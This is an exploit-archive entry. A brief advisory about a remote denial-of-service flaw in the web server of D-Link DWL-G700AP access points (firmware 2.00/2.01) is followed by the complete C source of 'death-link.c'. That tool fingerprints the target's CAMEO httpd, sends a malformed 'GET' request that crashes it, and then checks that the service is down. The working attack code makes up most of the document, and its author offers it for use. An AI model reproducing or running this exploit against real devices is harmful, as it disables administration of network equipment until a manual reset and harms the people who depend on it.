D-Link DWL-G700AP 2.00/2.01 HTTPD Denial of Service Vulnerability



source: http://www.securityfocus.com/bid/16690/info


D-Link DWL-G700AP HTTPD is prone to a remote denial-of-service vulnerability. This issue is due to a failure in the 'httpd' service to properly handle malformed data.

An attacker can exploit this issue to crash the affected webserver, effectively denying service to legitimate users. The affected device must be manually reset to restart the affected service.

This issue is reported to affect firmware versions 2.00 and 2.01; other firmware versions may also be vulnerable.

/*
                 death-link.c
                 ------------------------
                 written by l0om
                                 WWW.EXCLUDED.ORG
                 ------------------------
                 exploit tested on firmware: v2.00 and the latest v2.01
                 remote DoS exploit for the CAMEO-httpd which is running on the D-Link
                 Accesspoint DWL-G700AP. After executing this the accesspoint cannot be
                 configured anymore because the only way to administrate the AP is the
                 administration with your browser. you have to reboot the box to get the
                 httpd started again.

                 have phun!

                 // some greetings
                 maximilian, Prof. J. Dealer, Theldens, Commander Jansen, ole, detach,
                 mattball, molke, murfie, vy99
                 excluded.org people, IT31 people

                 // the guys who made exploiting possible with buying this AP
                 joerres, hermanns, schubert

*/


#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define                  DOSSTRING               "GET \n\n"
#define                  TARGET                          "CAMEO-httpd"
#define                  DESTPORT                80

int alive(char *ip);
int check_httpd(char *ip);
void help(void);
void header(void);
int DoS(char *ip);

int main(int argc, char **argv)
{
                 int fd, i, check = 0;
                 char *ip = NULL;

                 header();

                 if(argc > 1)
                                 for(i = 1; i < argc; i++)
                                                 if(argv[i][0] == '-')
                                                                 switch(argv[i][1]) {
                                                                                 case 'o':
                                                                                                 check = 2;
                                                                                                 break;
                                                                                 case 'c':
                                                                                                 check = 1;
                                                                                                 break;
                                                                                 case 'h':
                                                                                                 help();
                                                                                                 break;
                                                                                 default:
                                                                                                 printf("\t>> %s << unknown option\n",argv[i]);
                                                                                                 exit(-1);
                                                                 }
                                                 else ip = argv[i];

                 if(ip == NULL) help();

                 if(check) {
                                 printf("\tchecking target... "); fflush(stdout);
                                 i = check_httpd(ip);
                                 if(i <= 0) {
                                                 printf("faild! ");
                                                 if(!i) printf("invalid target webserver\n");
                                                 else printf("webserver already dead?\n");
                                                 exit(-1);
                                 }
                                 else printf("done! valid victim detected\n");
                                 if(check == 2) return 0;
                 }

                 printf("\tsending DoS... "); fflush(stdout);
                 if(DoS(ip) <= 0) {
                                 printf("faild!\n");
                                 return -1;
                 } else printf("done!\n");

                 sleep(1);
                 printf("\tchecking webserver status... "); fflush(stdout);
                 if(!alive(ip)) printf("%s DEAD\n",TARGET);
                 else printf("%s on %s is still alive :( \n",TARGET,ip);

                 return 0;
}

int check_httpd(char *ip)
{
                 int sockfd, nbytes, len, i = 0;
                 char buf[500], pattern[] = TARGET, *ptr;
                 struct sockaddr_in servaddr;

                 if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                                 perror("socket");
                                 exit(-1);
                 }
                 servaddr.sin_family = AF_INET;
                 servaddr.sin_port = htons(DESTPORT);
                 servaddr.sin_addr.s_addr = inet_addr(ip);

                 if(connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1)
                                 return -1;

                 if(!write(sockfd, "GET / HTTP/1.0\n\n", 16))
                                 return 0;
                 else nbytes = read(sockfd, buf, 500);

                 len = strlen(pattern);
                 ptr = buf;

                 while(nbytes--) {
                                 if(*ptr == pattern[i])
                                                 i++;
                                 else i = 0;
                                 if(i == len) return 1;
                                 else ptr++;
                 }
                 return 0;
}

int alive(char *ip)
{
                 int sockfd, nbytes, len, i = 0;
                 char buf[500], pattern[] = TARGET, *ptr;
                 struct sockaddr_in servaddr;

                 if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                                 perror("socket");
                                 exit(-1);
                 }
                 servaddr.sin_family = AF_INET;
                 servaddr.sin_port = htons(DESTPORT);
                 servaddr.sin_addr.s_addr = inet_addr(ip);

                 if(connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1)
                                 return 0;
                 else return 1;
}

int DoS(char *ip)
{
                 int sockfd, nbytes, len, i = 0;
                 char buf[500], pattern[] = TARGET, *ptr;
                 struct sockaddr_in servaddr;

                 if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                                 perror("socket");
                                 exit(-1);
                 }
                 servaddr.sin_family = AF_INET;
                 servaddr.sin_port = htons(DESTPORT);
                 servaddr.sin_addr.s_addr = inet_addr(ip);

                 if(connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1)
                                 return 0;
                 else return(write(sockfd, DOSSTRING, strlen(DOSSTRING)));
}

void help(void)
{
                 printf("\tdeath-link [options] <ip-address>\n");
                 printf("\t-o: ONLY CHECK for valid target\n");
                 printf("\t-c: check for valid target\n");
                 printf("\t-h: help\n");
                 exit(0);
}

void header(void)
{
                 printf("\tdeath-link - written by l0om\n");
                 printf("\t     WWW.EXCLUDED.ORG\n");
                 printf("\tDoS %s D-Link DWL-G700AP\n\n",TARGET);
}